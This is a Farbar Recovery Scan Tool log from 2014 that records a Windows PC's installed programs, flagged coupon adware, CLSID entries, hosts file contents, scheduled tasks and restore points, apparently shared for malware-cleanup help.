C:\Users\Dylan\AppData\Local\Temp\jre-7u71-windows-i586-iftw.exe
C:\Users\Hannah\AppData\Local\Temp\AutoRun.exe
C:\Users\Hannah\AppData\Local\Temp\AutoRunGUI.dll
C:\Users\Hannah\AppData\Local\Temp\EBU63AA.exe
C:\Users\Hannah\AppData\Local\Temp\jre-7u17-windows-i586-iftw.exe
C:\Users\Hannah\AppData\Local\Temp\optprosetup.exe
C:\Users\Hannah\AppData\Local\Temp\utt709F.tmp.exe
C:\Users\Nick\AppData\Local\Temp\eauninstall.exe
C:\Users\Nick\AppData\Local\Temp\jre-7u55-windows-i586-iftw.exe
C:\Users\Nick\AppData\Local\Temp\SimCity 4 Deluxe_uninst.exe
C:\Users\Nick\AppData\Local\Temp\_isB08.exe


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2014-11-01 01:07

==================== End Of Log ============================

 

Additional scan result of Farbar Recovery Scan Tool (x86) Version: 01-11-2014
Ran by Nick at 2014-11-01 10:09:04
Running from C:\Users\Nick\Desktop
Boot Mode: Normal
==========================================================


==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: avast! Antivirus (Disabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: avast! Antivirus (Disabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

µTorrent (HKCU\...\uTorrent) (Version: 3.3.1.30017 - BitTorrent Inc.)
Adobe Flash Player 15 Plugin (HKLM\...\Adobe Flash Player Plugin) (Version: 15.0.0.189 - Adobe Systems Incorporated)
Avast Free Antivirus (HKLM\...\Avast) (Version: 10.0.2206 - AVAST Software)
FlaashCoupon (HKLM\...\{8B114619-78B7-1CFF-55EF-74266954F883}) (Version:  - FlAShCOaupoun) <==== ATTENTION
GitHub (HKCU\...\5f7eb300e2ea4ebf) (Version: 1.2.3.0 - GitHub, Inc.)
Google Talk (remove only) (HKCU\...\{226b64e8-dc75-4eea-a6c8-abcb496320f2}-Google Talk) (Version:  - )
join.me (HKCU\...\JoinMe) (Version: 1.3.1.426 - LogMeIn, Inc.)
Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.0.285.6 - McAfee, Inc.)
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft .NET Framework 4 Multi-Targeting Pack (HKLM\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Games for Windows - LIVE Redistributable (HKLM\...\{8FB1B528-E260-451E-9B55-E9152F94B80B}) (Version: 3.2.3.0 - Microsoft Corporation)
Microsoft Help Viewer 1.0 (HKLM\...\Microsoft Help Viewer 1.0) (Version: 1.0.30319 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Management Objects (HKLM\...\{4E968D9C-21A7-4915-B698-F7AEB913541D}) (Version: 10.50.1447.4 - Microsoft Corporation)
Microsoft SQL Server Compact 3.5 SP2 ENU (HKLM\...\{3A9FC03D-C685-4831-94CF-4EDFD3749497}) (Version: 3.5.8080.0 - Microsoft Corporation)
Microsoft SQL Server System CLR Types (HKLM\...\{2A2F3AE8-246A-4252-BB26-1BEB45627074}) (Version: 10.50.1447.4 - Microsoft Corporation)
Microsoft Visual C# 2010 Express - ENU (HKLM\...\Microsoft Visual C# 2010 Express - ENU) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4974 (HKLM\...\{B7E38540-E355-3503-AFD7-635B2F2F76E1}) (Version: 9.0.30729.4974 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio 2010 ADO.NET Entity Framework Tools (HKLM\...\{14DD7530-CCD2-3798-B37D-3839ED6A441C}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft WSE 3.0 Runtime (HKLM\...\{E3E71D07-CD27-46CB-8448-16D4FB29AA13}) (Version: 3.0.5305.0 - Microsoft Corp.)
Microsoft XNA Framework Redistributable 4.0 (HKLM\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
Microsoft XNA Game Studio 4.0 (HKLM\...\XNA Game Studio 4.0) (Version: 4.0.20823.0 - Microsoft Corporation)
Microsoft XNA Game Studio Platform Tools (HKLM\...\{0666E46E-A860-4353-BE6D-13AA72FABB57}) (Version: 1.3.0.0 - Microsoft Corporation)
Mozilla Firefox 33.0 (x86 en-US) (HKLM\...\Mozilla Firefox 33.0 (x86 en-US)) (Version: 33.0 - Mozilla)
RealNetworks - Microsoft Visual C++ 2008 Runtime (Version: 9.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (Version: 10.0 - RealNetworks, Inc) Hidden
SaalesCheckEr (HKLM\...\{CC17A332-9555-AD95-3985-0BDD9BF0EC71}) (Version:  - "")
Sean O'Connor's Windows Games (HKLM\...\Sean O'Connor's Windows Games_is1) (Version:  - Sean O'Connor's Windows Games)
ShockWave Map Pack (HKCU\...\ShockWave Map Pack) (Version:  - )
Spotify (HKCU\...\Spotify) (Version: 0.8.3.222.g317ab79d - Spotify AB)
UltraVnc (HKLM\...\Ultravnc2_is1) (Version: 1.2.0.3 - uvnc bvba)
unicoupons (HKLM\...\{6F10CA8F-97E3-48FB-9003-3EE8E9050577}) (Version:  - unicoupons) <==== ATTENTION
Visual Studio 2010 Tools for SQL Server Compact 3.5 SP2 ENU (HKLM\...\{112C23F2-C036-4D40-BED4-0CB47BF5555C}) (Version: 4.0.8080.0 - Microsoft Corporation)
Windows 7 USB/DVD Download Tool (HKLM\...\{CCF298AF-9CE1-4B26-B251-486E98A34789}) (Version: 1.0.30 - Microsoft Corporation)
Windows Installer Clean Up (HKLM\...\{121634B0-2F4B-11D3-ADA3-00C04F52DD52}) (Version: 3.00.00.0000 - Microsoft Corporation)
Windows Live Essentials (HKLM\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
Windows Media Player Firefox Plugin (HKLM\...\{69FDFBB6-351D-4B8C-89D8-867DC9D0A2A4}) (Version: 1.0.0.8 - Microsoft Corp)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1003_Classes\CLSID\{022105BD-948A-40C9-AB42-A3300DDF097F}\localserver32 -> C:\Users\Nick\AppData\Local\Google\Update\GoogleUpdate.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1003_Classes\CLSID\{0507EEDE-3AE7-49c7-BF37-0EB4A62D8638}\localserver32 -> C:\Users\Nick\AppData\Roaming\Google\Google Talk\googletalk.exe (Google)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1003_Classes\CLSID\{22181302-A8A6-4F84-A541-E5CBFC70CC43}\localserver32 -> C:\Users\Nick\AppData\Local\Google\Update\1.3.24.7\GoogleUpdateOnDemand.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1003_Classes\CLSID\{2F0E2680-9FF5-43C0-B76E-114A56E93598}\localserver32 -> C:\Users\Nick\AppData\Local\Google\Update\1.3.24.7\GoogleUpdateOnDemand.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1003_Classes\CLSID\{31261F21-2B16-45EE-BEAB-07C4CFA18B65}\InprocServer32 -> C:\Program Files\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1003_Classes\CLSID\{33b07fd4-5917-43e1-968d-4c79231836bf}\localserver32 -> C:\Users\Nick\AppData\Roaming\Google\Google Talk\googletalk.exe (Google)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1003_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Nick\AppData\Local\Google\Update\1.3.23.9\psuser.dll No File
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1003_Classes\CLSID\{39125640-8D80-11DC-A2FE-C5C455D89593}\InprocServer32 -> C:\Users\Nick\AppData\Local\Google\Google Talk Plugin\googletalkax.dll (Google)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1003_Classes\CLSID\{51F9E8EF-59D7-475B-A106-C7EA6F30C119}\localserver32 -> C:\Users\Nick\AppData\Local\Google\Update\1.3.24.7\GoogleUpdateOnDemand.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1003_Classes\CLSID\{A45426FB-E444-42B2-AA56-419F8FBEEC61}\InprocServer32 -> C:\Users\Nick\AppData\Local\Google\Update\1.3.22.3\psuser.dll No File
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1003_Classes\CLSID\{A54D478D-4F70-4F72-9A74-17C9986E35AB}\InprocServer32 -> C:\Users\Nick\AppData\Local\Google\Update\1.3.21.165\psuser.dll No File
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1003_Classes\CLSID\{A8F086C3-2497-4229-82FE-586F2D326F95}\localserver32 -> C:\Users\Nick\AppData\Roaming\Google\Google Talk\googletalk.exe (Google)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1003_Classes\CLSID\{AB9F4455-E591-4132-A386-0B91EAEDB96C}\InprocServer32 -> C:\Users\Nick\AppData\Local\Google\Google Talk Plugin\o1dax.dll (Google)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1003_Classes\CLSID\{BDC217C5-ED16-11CD-956C-0000C04E4C0A}\InprocServer32 -> C:\Windows\System32\TABCTL32.OCX (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1003_Classes\CLSID\{C3101A8B-0EE1-4612-BFE9-41FFC1A3C19D}\InprocServer32 -> C:\Users\Nick\AppData\Local\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1003_Classes\CLSID\{C442AC41-9200-4770-8CC0-7CDB4F245C55}\InprocServer32 -> C:\Users\Nick\AppData\Local\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1003_Classes\CLSID\{d33f3ced-d7d5-44f1-a9fe-6927dabb1934}\localserver32 -> C:\Users\Nick\AppData\Roaming\Google\Google Talk\googletalk.exe (Google)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1003_Classes\CLSID\{E67BE843-BBBE-4484-95FB-05271AE86750}\localserver32 -> C:\Users\Nick\AppData\Local\Google\Update\1.3.24.7\GoogleUpdateOnDemand.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1003_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Nick\AppData\Local\Google\Update\1.3.24.7\psuser.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1003_Classes\CLSID\{EB06378B-ABB6-4B3C-9B40-D488DD8A6E93}\InprocServer32 -> C:\Users\Nick\AppData\Local\Google\Update\1.3.22.5\psuser.dll No File
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1003_Classes\CLSID\{F9043C85-F6F2-101A-A3C9-08002B2F49FB}\InprocServer32 -> C:\Windows\system32\COMDLG32.OCX (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1003_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\Nick\AppData\Local\Google\Update\1.3.24.7\psuser.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{022105BD-948A-40C9-AB42-A3300DDF097F}\localserver32 -> C:\Users\Nick\AppData\Local\Google\Update\GoogleUpdate.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{0507EEDE-3AE7-49c7-BF37-0EB4A62D8638}\localserver32 -> C:\Users\Bill\AppData\Roaming\Google\Google Talk\googletalk.exe No File
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{22181302-A8A6-4F84-A541-E5CBFC70CC43}\localserver32 -> "C:\Users\Nick\AppData\Local\Google\Update\1.3.23.9\GoogleUpdateOnDemand.exe" No File
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{2F0E2680-9FF5-43C0-B76E-114A56E93598}\localserver32 -> "C:\Users\Nick\AppData\Local\Google\Update\1.3.23.9\GoogleUpdateOnDemand.exe" No File
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{31261F21-2B16-45EE-BEAB-07C4CFA18B65}\InprocServer32 -> C:\Program Files\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{33b07fd4-5917-43e1-968d-4c79231836bf}\localserver32 -> C:\Users\Bill\AppData\Roaming\Google\Google Talk\googletalk.exe No File
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Bill\AppData\Local\Google\Update\1.3.23.9\psuser.dll No File
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{39125640-8D80-11DC-A2FE-C5C455D89593}\InprocServer32 -> C:\Users\Nick\AppData\Local\Google\Google Talk Plugin\googletalkax.dll (Google)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{3C4F3BE3-47EB-101B-A3C9-08002B2F49FB}\InprocServer32 -> C:\Windows\system32\comdlg32.ocx (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{3C4F3BE5-47EB-101B-A3C9-08002B2F49FB}\InprocServer32 -> C:\Windows\system32\comdlg32.ocx (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{3C4F3BE7-47EB-101B-A3C9-08002B2F49FB}\InprocServer32 -> C:\Windows\system32\comdlg32.ocx (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{51F9E8EF-59D7-475B-A106-C7EA6F30C119}\localserver32 -> "C:\Users\Nick\AppData\Local\Google\Update\1.3.23.9\GoogleUpdateOnDemand.exe" No File
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{7629CFA2-3FE5-101B-A3C9-08002B2F49FB}\InprocServer32 -> C:\Windows\system32\comdlg32.ocx (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{7629CFA4-3FE5-101B-A3C9-08002B2F49FB}\InprocServer32 -> C:\Windows\system32\comdlg32.ocx (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{7DA06D40-54A0-11CF-A521-0080C77A7786}\InprocServer32 -> C:\Windows\system32\tabctl32.ocx (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{A45426FB-E444-42B2-AA56-419F8FBEEC61}\InprocServer32 -> C:\Users\Bill\AppData\Local\Google\Update\1.3.22.3\psuser.dll No File
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{A54D478D-4F70-4F72-9A74-17C9986E35AB}\InprocServer32 -> C:\Users\Bill\AppData\Local\Google\Update\1.3.21.165\psuser.dll No File
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{A8F086C3-2497-4229-82FE-586F2D326F95}\localserver32 -> C:\Users\Bill\AppData\Roaming\Google\Google Talk\googletalk.exe No File
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{AB9F4455-E591-4132-A386-0B91EAEDB96C}\InprocServer32 -> C:\Users\Nick\AppData\Local\Google\Google Talk Plugin\o1dax.dll (Google)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{BDC217C5-ED16-11CD-956C-0000C04E4C0A}\InprocServer32 -> C:\Windows\system32\tabctl32.ocx (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{C3101A8B-0EE1-4612-BFE9-41FFC1A3C19D}\InprocServer32 -> C:\Users\Bill\AppData\Local\Google\Update\1.3.23.9\npGoogleUpdate3.dll No File
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{C442AC41-9200-4770-8CC0-7CDB4F245C55}\InprocServer32 -> C:\Users\Bill\AppData\Local\Google\Update\1.3.23.9\npGoogleUpdate3.dll No File
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{d33f3ced-d7d5-44f1-a9fe-6927dabb1934}\localserver32 -> C:\Users\Bill\AppData\Roaming\Google\Google Talk\googletalk.exe No File
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{E67BE843-BBBE-4484-95FB-05271AE86750}\localserver32 -> "C:\Users\Nick\AppData\Local\Google\Update\1.3.23.9\GoogleUpdateOnDemand.exe" No File
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Bill\AppData\Local\Google\Update\1.3.23.9\psuser.dll No File
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{EB06378B-ABB6-4B3C-9B40-D488DD8A6E93}\InprocServer32 -> C:\Users\Bill\AppData\Local\Google\Update\1.3.22.5\psuser.dll No File
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{F9043C85-F6F2-101A-A3C9-08002B2F49FB}\InprocServer32 -> C:\Windows\system32\comdlg32.ocx (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Bill\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Bill\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Bill\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Bill\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Bill\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Bill\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Bill\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Bill\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)

==================== Restore Points  =========================

30-10-2014 07:00:02 Scheduled Checkpoint
31-10-2014 07:00:02 Scheduled Checkpoint
31-10-2014 09:27:23 Windows Update
01-11-2014 07:00:02 Scheduled Checkpoint

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2006-11-02 03:23 - 2013-03-26 14:20 - 00001367 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1                activate.adobe.com
127.0.0.1                practivate.adobe.com
127.0.0.1                ereg.adobe.com
127.0.0.1                activate.wip3.adobe.com
127.0.0.1                wip3.adobe.com
127.0.0.1                3dns-3.adobe.com
127.0.0.1                3dns-2.adobe.com
127.0.0.1                adobe-dns.adobe.com
127.0.0.1                adobe-dns-2.adobe.com
127.0.0.1                adobe-dns-3.adobe.com
127.0.0.1                ereg.wip3.adobe.com
127.0.0.1                activate-sea.adobe.com
127.0.0.1                wwis-dubc1-vip60.adobe.com
127.0.0.1                activate-sjc0.adobe.com
127.0.0.1                               adobe.activate.com


==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {075F7B0C-8858-426A-81EA-5161F4D13E82} - System32\Tasks\Microsoft\Windows\Shell\CrawlStartPages
Task: {2EF1A2C3-210D-4AFD-BEB7-E51E7FD69C0C} - System32\Tasks\Microsoft\Windows\MobilePC\TMM
Task: {447EF652-81EB-4A87-AE24-237265C7BD4E} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-2927482541-673307907-4085399872-1003UA => C:\Users\Nick\AppData\Local\Google\Update\GoogleUpdate.exe [2013-04-10] (Google Inc.)
Task: {5351DC86-6954-4477-A51C-ECDA4CD9C527} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2014-10-26] (Adobe Systems Incorporated)
Task: {612A9231-466D-4733-98F5-24DE2C16CA7C} - System32\Tasks\{5735D215-420F-46D5-93FD-87F7CCE68FB1} => Firefox.exe http://ui.skype.com/ui/0/6.3.73.105.457/en/abandoninstall?page=tsProgressBar
Task: {74F446E1-431E-4F82-AE81-3A9F6D649CC7} - System32\Tasks\Microsoft\Windows\NetworkAccessProtection\NAPStatus UI
Task: {99ABE7F2-15E4-4DC2-869C-5A32245F7529} - System32\Tasks\TS => C:\Windows\System32\tsdiscon.exe [2009-04-10] (Microsoft Corporation)
Task: {9A56A77B-6296-44AE-B933-8F38D08DA943} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {A302FD2A-8C61-40E8-A448-DEF007F98AF8} - System32\Tasks\{7107BA25-B7A3-444D-A29C-5A8A793D34F7} => Firefox.exe http://ui.skype.com/ui/0/6.3.73.105.457/en/abandoninstall?page=tsWLM
Task: {C23F38D7-618A-42E1-B944-5F3580DB4128} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2010-11-20] (Google Inc.)
Task: {D1145987-C734-479D-A3EE-CD7FBA8A6852} - System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-2927482541-673307907-4085399872-1003 => C:\Program Files\Real\RealUpgrade\RealUpgrade.exe [2012-11-30] (RealNetworks, Inc.)
Task: {D5C071A0-B9CA-4157-A690-4AD040A8E292} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-2927482541-673307907-4085399872-1003Core => C:\Users\Nick\AppData\Local\Google\Update\GoogleUpdate.exe [2013-04-10] (Google Inc.)
Task: {DD987E28-0257-46F3-BE19-DFDECFAB211D} - System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-2927482541-673307907-4085399872-1003 => C:\Program Files\Real\RealUpgrade\RealUpgrade.exe [2012-11-30] (RealNetworks, Inc.)
Task: {E986862A-C64E-4935-AE99-A25AE314983F} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2012-11-23] (Piriform Ltd)
Task: {EB51F75A-9338-40EC-B51D-99B484C578DA} - System32\Tasks\avast! Emergency Update => C:\Program Files\Alwil Software\Avast5\AvastEmUpdate.exe [2014-10-26] (AVAST Software)
Task: {F39781AF-5991-4E01-98DC-BB813D6A14B8} - System32\Tasks\{3AEB2CCF-2276-4279-B862-1B6ECC1BBA06} => Firefox.exe http://ui.skype.com/ui/0/6.3.73.105.457/en/abandoninstall?page=tsProgressBar
Task: {F74350EB-FFEF-4536-A95D-BF6CEA19C566} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [2010-11-20] (Google Inc.)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2927482541-673307907-4085399872-1003Core.job => C:\Users\Nick\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2927482541-673307907-4085399872-1003UA.job => C:\Users\Nick\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\User_Feed_Synchronization-{C479CE1A-76B9-4D6F-8D71-575C334B2024}.job => C:\Windows\system32\msfeedssync.exe
Task: C:\Windows\Tasks\User_Feed_Synchronization-{F9D43FD3-5681-4AEF-A862-17FF1653F989}.job => C:\Windows\system32\msfeedssync.exe

==================== Loaded Modules (whitelisted) =============

2014-11-01 04:12 - 2014-11-01 04:12 - 02898944 _____ () C:\Program Files\Alwil Software\Avast5\defs\14110100\algo.dll
2013-04-20 12:07 - 2012-10-04 19:50 - 00088688 _____ () C:\Windows\System32\cpwmon2k.dll
2014-04-23 16:05 - 2014-04-23 16:05 - 00073544 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2014-04-23 16:04 - 2014-04-23 16:04 - 01044808 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
